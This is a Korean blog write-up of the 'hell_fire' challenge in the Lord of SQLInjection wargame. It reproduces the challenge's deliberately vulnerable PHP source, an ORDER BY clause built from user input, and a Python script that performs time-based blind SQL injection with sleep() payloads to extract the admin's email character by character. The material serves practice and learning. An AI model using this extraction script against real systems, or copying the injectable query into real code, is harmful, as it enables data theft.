[ LOS ] Lord of SQLInjection 23번 풀이(hell_fire)

sangjun

·

2022. 1. 12. 12:51

반응형

 

문제소스

id	email	score
query : select id,email,score from prob_hell_fire where 1 order by
<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|proc|union/i', $_GET[order])) exit("No Hack ~_~");
  $query = "select id,email,score from prob_hell_fire where 1 order by {$_GET[order]}";
  echo "<table border=1><tr><th>id</th><th>email</th><th>score</th>";
  $rows = mysqli_query($db,$query);
  while(($result = mysqli_fetch_array($rows))){
    if($result['id'] == "admin") $result['email'] = "**************";
    echo "<tr><td>{$result[id]}</td><td>{$result[email]}</td><td>{$result[score]}</td></tr>";
  }
  echo "</table><hr>query : <strong>{$query}</strong><hr>";

  $_GET[email] = addslashes($_GET[email]);
  $query = "select email from prob_hell_fire where id='admin' and email='{$_GET[email]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['email']) && ($result['email'] === $_GET['email'])) solve("hell_fire");
  highlight_file(__FILE__);
?>

문제 분석 및 페이로드

1. time based sqli

2. adbin_secure_email~~라고 나오는데 admin으로 고쳐줘야 클리어 됐다..왜지..? --> 네트워크를 통해 

TIME BASED라서 네트워크가 느릴때 오류가 나오는거일 수도..?

#참이면 Hello admin을 출력한다.
import requests
import string
import time
from pwn import *
URL="https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php"
brute=string.digits+string.ascii_letters+string.punctuation
cookies={"PHPSESSID":"kogf8srvhks2phbp9kdndnk5ar"}
passwd=""
print(brute)
length=-1
#find passwd Length
for i in range(100):
    query=f"""?order=if(id='admin' and length(email)={i},sleep(1),1)"""  #그냥 leng(pw)해주면 guest pw가 4라서 이상하게 나온다.
    start=time.time()
    response=requests.get(URL+query,cookies=cookies)
    end=time.time()-start
    if end>1:
        length=i
        break

print(f"pass length is {length}")
#find passwd
for i in range(1,length+1):
    for ch in brute:
        start=time.time()
        query=f"""?order=if(id='admin' and ord(mid(email,{i},1))={ord(ch)},sleep(1),1)"""
        response=requests.get(URL+query,cookies=cookies)
        end=time.time()-start
        print(query)
        if end>1:
            passwd+=ch
            log.critical(f"{ch}")
            break

print(f"passwd is {passwd}")

반응형

0개의 댓글